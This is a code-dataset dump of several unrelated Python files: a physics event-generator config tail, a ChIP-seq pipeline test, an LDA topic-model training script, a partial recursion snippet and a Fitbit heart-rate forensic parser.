'MDME(205,1) = 0 !W decay into bbar tp',
'MDME(206,1) = 0 !W decay into e+ nu_e',
'MDME(207,1) = 1 !W decay into mu+ nu_mu',
'MDME(208,1) = 0 !W decay into tau+ nu_tau'),
parameterSets = cms.vstring('pythiaUESettings',
'processParameters')
)
)
configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$Revision: 1.1 $'),
name = cms.untracked.string('$Source: /cvs_server/repositories/CMSSW/CMSSW/Configuration/GenProduction/python/HI/Pyquen_WToMuNu_TuneZ2_5023GeV_pythia6_cfi.py,v $'),
    annotation = cms.untracked.string('PYQUEN-Wmunu Tune Z2 at 8.16 TeV')
)
#ProductionFilterSequence = cms.Sequence(hiSignal)
ProductionFilterSequence = cms.Sequence(generator)
| [
"[email protected]"
] | |
b05505c9b445af3674a860fe8d4fd78dda734376 | b9cd1b9758e58f00335900fd120e1d47c23600ce | /tests/test_pipeline_chipseq.py | 543d39616238213767af72ed8a467fa36a735e65 | [
"Apache-2.0"
] | permissive | Multiscale-Genomics/mg-process-fastq | 4fb7fef68526237f06312a3f137df031a448731c | 50c7115c0c1a6af48dc34f275e469d1b9eb02999 | refs/heads/master | 2020-04-12T06:46:01.100270 | 2018-11-19T16:05:03 | 2018-11-19T16:05:03 | 64,320,140 | 2 | 4 | Apache-2.0 | 2018-11-16T16:54:54 | 2016-07-27T15:29:25 | Python | UTF-8 | Python | false | false | 7,060 | py | """
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import os.path
import pytest
from basic_modules.metadata import Metadata
from process_chipseq import process_chipseq
@pytest.mark.chipseq
@pytest.mark.pipeline
def test_chipseq_pipeline_00():
"""
Test case to ensure that the ChIP-seq pipeline code works.
Running the pipeline with the test data from the command line:
.. code-block:: none
runcompss \\
--lang=python \\
--library_path=${HOME}/bin \\
--pythonpath=/<pyenv_virtenv_dir>/lib/python2.7/site-packages/ \\
--log_level=debug \\
process_chipseq.py \\
--taxon_id 9606 \\
--genome /<dataset_dir>/Human.GCA_000001405.22.fasta \\
--assembly GRCh38 \\
--file /<dataset_dir>/DRR000150.22.fastq
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
files = {
'genome': resource_path + 'macs2.Human.GCA_000001405.22.fasta',
'loc': resource_path + 'macs2.Human.DRR000150.22.fastq',
'index': resource_path + 'macs2.Human.GCA_000001405.22.fasta.bwa.tar.gz'
}
metadata = {
"genome": Metadata(
"Assembly", "fasta", files['genome'], None,
{'assembly': 'GCA_000001405.22'}),
"loc": Metadata(
"data_chip_seq", "fastq", files['loc'], None,
{'assembly': 'GCA_000001405.22'}
),
"index": Metadata(
"Index", "bwa_index", files['index'], files['genome'],
{'assembly': 'GCA_000001405.22', "tool": "bwa_indexer"}),
}
root_name = files['loc'].split("/")
root_name[-1] = root_name[-1].replace('.fastq', '')
files_out = {
"bam": files['loc'].replace(".fastq", ".bam"),
"bai": files['loc'].replace(".fastq", ".bai"),
"filtered": files['loc'].replace(".fastq", "_filtered.bam"),
"output": files['loc'].replace(".fastq", ".tsv"),
'narrow_peak': '/'.join(root_name) + '_filtered_peaks.narrowPeak',
'summits': '/'.join(root_name) + '_filtered_summits.bed',
'broad_peak': '/'.join(root_name) + '_filtered_peaks.broadPeak',
'gapped_peak': '/'.join(root_name) + '_filtered_peaks.gappedPeak'
}
chipseq_handle = process_chipseq({"macs_nomodel_param": True, "execution": resource_path})
chipseq_files, chipseq_meta = chipseq_handle.run(files, metadata, files_out) # pylint: disable=unused-variable
print(chipseq_files)
# Add tests for all files created
for f_out in chipseq_files:
print("CHIP-SEQ RESULTS FILE:", f_out)
# assert chipseq_files[f_out] == files_out[f_out]
assert os.path.isfile(chipseq_files[f_out]) is True
assert os.path.getsize(chipseq_files[f_out]) > 0
try:
os.remove(chipseq_files[f_out])
except OSError as ose:
print("Error: %s - %s." % (ose.filename, ose.strerror))
@pytest.mark.chipseq
@pytest.mark.pipeline
def test_chipseq_pipeline_01():
"""
Test case to ensure that the ChIP-seq pipeline code works.
Running the pipeline with the test data from the command line:
.. code-block:: none
runcompss \\
--lang=python \\
--library_path=${HOME}/bin \\
--pythonpath=/<pyenv_virtenv_dir>/lib/python2.7/site-packages/ \\
--log_level=debug \\
process_chipseq.py \\
--taxon_id 9606 \\
--genome /<dataset_dir>/Human.GCA_000001405.22.fasta \\
--assembly GRCh38 \\
--file /<dataset_dir>/DRR000150.22.fastq
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
files = {
'genome_public': resource_path + 'macs2.Human.GCA_000001405.22.fasta',
'loc': resource_path + 'macs2.Human.DRR000150.22.fastq',
'index_public': resource_path + 'macs2.Human.GCA_000001405.22.fasta.bwa.tar.gz'
}
metadata = {
"genome_public": Metadata(
"Assembly", "fasta", files['genome_public'], None,
{'assembly': 'GCA_000001405.22'}),
"loc": Metadata(
"data_chip_seq", "fastq", files['loc'], None,
{'assembly': 'GCA_000001405.22'}
),
"index_public": Metadata(
"Index", "bwa_index", files['index_public'], files['genome_public'],
{'assembly': 'GCA_000001405.22', "tool": "bwa_indexer"}),
}
root_name = files['loc'].split("/")
root_name[-1] = root_name[-1].replace('.fastq', '')
files_out = {
"bam": files['loc'].replace(".fastq", ".bam"),
"bai": files['loc'].replace(".fastq", ".bai"),
"filtered": files['loc'].replace(".fastq", "_filtered.bam"),
"output": files['loc'].replace(".fastq", ".tsv"),
'narrow_peak': '/'.join(root_name) + '_filtered_peaks.narrowPeak',
'summits': '/'.join(root_name) + '_filtered_summits.bed',
'broad_peak': '/'.join(root_name) + '_filtered_peaks.broadPeak',
'gapped_peak': '/'.join(root_name) + '_filtered_peaks.gappedPeak'
}
chipseq_handle = process_chipseq({"macs_nomodel_param": True, "execution": resource_path})
chipseq_files, chipseq_meta = chipseq_handle.run(files, metadata, files_out) # pylint: disable=unused-variable
print(chipseq_files)
# Add tests for all files created
for f_out in chipseq_files:
print("CHIP-SEQ RESULTS FILE:", f_out)
# assert chipseq_files[f_out] == files_out[f_out]
assert os.path.isfile(chipseq_files[f_out]) is True
assert os.path.getsize(chipseq_files[f_out]) > 0
try:
os.remove(chipseq_files[f_out])
except OSError as ose:
print("Error: %s - %s." % (ose.filename, ose.strerror))
| [
"[email protected]"
] | |
c4e2b115dbe1fb2ca6e5626b223b88a4f3dde73e | b0e67fbd4c42aba24f7d4bccb99e9aa037c0b7d5 | /lda/train_LDA.py | 39ade7589cc4a9b7f6176b106691125a03142547 | [] | no_license | gombru/SocialMediaWeakLabeling | f979aea8218be115758ff8e1e9a945a701ac99b9 | 518437903ba7370a4098303a41196a08f1d6a58e | refs/heads/master | 2022-02-26T17:49:08.997335 | 2022-02-10T12:54:57 | 2022-02-10T12:54:57 | 84,461,511 | 15 | 4 | null | null | null | null | UTF-8 | Python | false | false | 5,004 | py | # Trains and saves an LDA model with the given text files.
from nltk.tokenize import RegexpTokenizer
from stop_words import get_stop_words
from nltk.stem.porter import PorterStemmer
from gensim import corpora, models
import glob
import string
import random
import numpy as np
whitelist = string.letters + string.digits + ' '
instagram_text_data_path = '../../../datasets/SocialMedia/captions_resized_1M/cities_instagram/'
model_path = '../../../datasets/SocialMedia/models/LDA/lda_model_cities_instagram_1M_500_5000chunck.model'
words2filter = ['rt','http','t','gt','co','s','https','http','tweet','markars_','photo','pictur','picture','say','photo','much','tweet','now','blog']
cities = ['london','newyork','sydney','losangeles','chicago','melbourne','miami','toronto','singapore','sanfrancisco']
num_topics = 500
threads = 8
passes = 1 #Passes over the whole corpus
chunksize = 5000 #Update the model every 10000 documents
# See https://radimrehurek.com/gensim/wiki.html
update_every = 1
repetition_threshold = 20
#Initialize Tokenizer
tokenizer = RegexpTokenizer(r'\w+')
# create English stop words list
en_stop = get_stop_words('en')
# add own stop words
for w in words2filter:
en_stop.append(w)
# Create p_stemmer of class PorterStemmer
p_stemmer = PorterStemmer()
posts_text = []
texts = [] #List of lists of tokens
# -- LOAD DATA FROM INSTAGRAM --
for city in cities:
print "Loading data from " + city
for file_name in glob.glob(instagram_text_data_path + city + "/*.txt"):
caption = ""
filtered_caption = ""
file = open(file_name, "r")
for line in file:
caption = caption + line
# Replace hashtags with spaces
caption = caption.replace('#', ' ')
# Keep only letters and numbers
for char in caption:
if char in whitelist:
filtered_caption += char
posts_text.append(filtered_caption.decode('utf-8').lower())
# print filtered_caption.decode('utf-8')
print "Number of posts: " + str(len(posts_text))
print "Creating tokens"
c= 0
for t in posts_text:
c += 1
if c % 10000 == 0:
print c
try:
t = t.lower()
tokens = tokenizer.tokenize(t)
# remove stop words from tokens
stopped_tokens = [i for i in tokens if not i in en_stop]
# stem token
text = [p_stemmer.stem(i) for i in stopped_tokens]
        # add processed text to list of lists
texts.append(text)
except:
continue
# TODO: delete already-processed elements from the source list if memory becomes a limitation
#del tweets_text[0]
posts_text = []
# Remove words that appear less than N times
print "Removing words appearing less than: " + str(repetition_threshold)
from collections import defaultdict
frequency = defaultdict(int)
for text in texts:
for token in text:
frequency[token] += 1
texts = [[token for token in text if frequency[token] > repetition_threshold] for text in texts]
# Construct a document-term matrix to understand how frequently each term occurs within each document
# The Dictionary() function traverses texts, assigning a unique integer id to each unique token while also collecting word counts and relevant statistics.
# To see each token's unique integer id, try print(dictionary.token2id)
dictionary = corpora.Dictionary(texts)
print(dictionary)
# TODO check this
# dictionary.compactify()
# Filter out tokens that appear in less than no_below documents (absolute number) or more than no_above documents (fraction of total corpus size, not absolute number).
# after (1) and (2), keep only the first keep_n most frequent tokens (or keep all if None).
# dictionary.filter_extremes(no_below=no_below, no_above=no_above, keep_n=None)
# dictionary.compactify() # remove gaps in id sequence after words that were removed
# Convert dictionary to a BoW
# The result is a list of vectors equal in length to the number of documents. Each document contains tuples of (term ID, term frequency)
corpus = [dictionary.doc2bow(text) for text in texts]
texts = []
#Randomize training elements
corpus = np.random.permutation(corpus)
# Generate an LDA model
print "Creating LDA model"
# the minimum_probability=0 argument is necessary in order for
# gensim to return the full document-topic-distribution matrix. If
# this argument is omitted and left to the gensim default of 0.01,
# then all document-topic weights below that threshold will be
# returned as NaN, violating the subsequent LDAvis assumption that
# all rows (documents) in the document-topic-distribution matrix sum
# to 1.
#ldamodel = models.ldamodel.LdaModel(corpus, num_topics=num_topics, id2word = dictionary, passes=passes, minimum_probability=0)
ldamodel = models.LdaMulticore(corpus, num_topics=num_topics, id2word = dictionary, chunksize=chunksize, passes=passes, workers=threads, minimum_probability=0)
ldamodel.save(model_path)
# Our LDA model is now stored as ldamodel
print(ldamodel.print_topics(num_topics=8, num_words=10))
print "DONE"
| [
"[email protected]"
] | |
09b194ff61b3e409331b5fb117555aaaa998c26a | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/find_max_20200722114432.py | 63139ffb63e0f85ee0899b804e0ff82130382654 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | items = [6,20,8,19,56,23,87,41,49,53]
def find_max(items):
# Breaking condition
if len(items) == 1:
return items[0]
op1 = items[0]
op2 = find_max(items[1:])
| [
"[email protected]"
] | |
907769470c06a9adb96a73b04f9ea62d43e0d19c | 0ee4debe412b996de7f5a592800515ae7104c5a5 | /scripts/artifacts/fitbitHeart.py | 6710cc413d11222ce7d902507ea13b4b8ec52313 | [
"MIT"
] | permissive | kibaffo33/ALEAPP | af7eebd9d4ab078c57c4108ebab0c80c89df8630 | ca50b7d665dccb846ff601b7b797d754eb8100d9 | refs/heads/master | 2022-06-15T03:55:37.407875 | 2022-06-13T20:39:47 | 2022-06-13T20:39:47 | 243,058,738 | 1 | 0 | null | 2020-02-25T17:29:43 | 2020-02-25T17:29:36 | null | UTF-8 | Python | false | false | 1,477 | py | import sqlite3
import textwrap
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, tsv, timeline, is_platform_windows, open_sqlite_db_readonly
def get_fitbitHeart(files_found, report_folder, seeker, wrap_text):
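    # Reads HEART_RATE_DAILY_SUMMARY from the Fitbit SQLite database and writes the
    # daily average/resting heart-rate values to the HTML, TSV and timeline reports.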
file_found = str(files_found[0])
db = open_sqlite_db_readonly(file_found)
cursor = db.cursor()
cursor.execute('''
SELECT
datetime("DATE_TIME"/1000, 'unixepoch'),
AVERAGE_HEART_RATE,
RESTING_HEART_RATE
FROM HEART_RATE_DAILY_SUMMARY
''')
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
report = ArtifactHtmlReport('Fitbit Heart Rate Summary')
report.start_artifact_report(report_folder, 'Fitbit Heart Rate Summary')
report.add_script()
data_headers = ('Timestamp','Avg. Heart Rate','Resting Heart Rate')
data_list = []
for row in all_rows:
data_list.append((row[0],row[1],row[2]))
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = f'Fitbit Heart Rate Summary'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = f'Fitbit Heart Rate Summary'
timeline(report_folder, tlactivity, data_list, data_headers)
else:
logfunc('No Fitbit Heart Rate Summary data available')
db.close()
| [
"[email protected]"
] |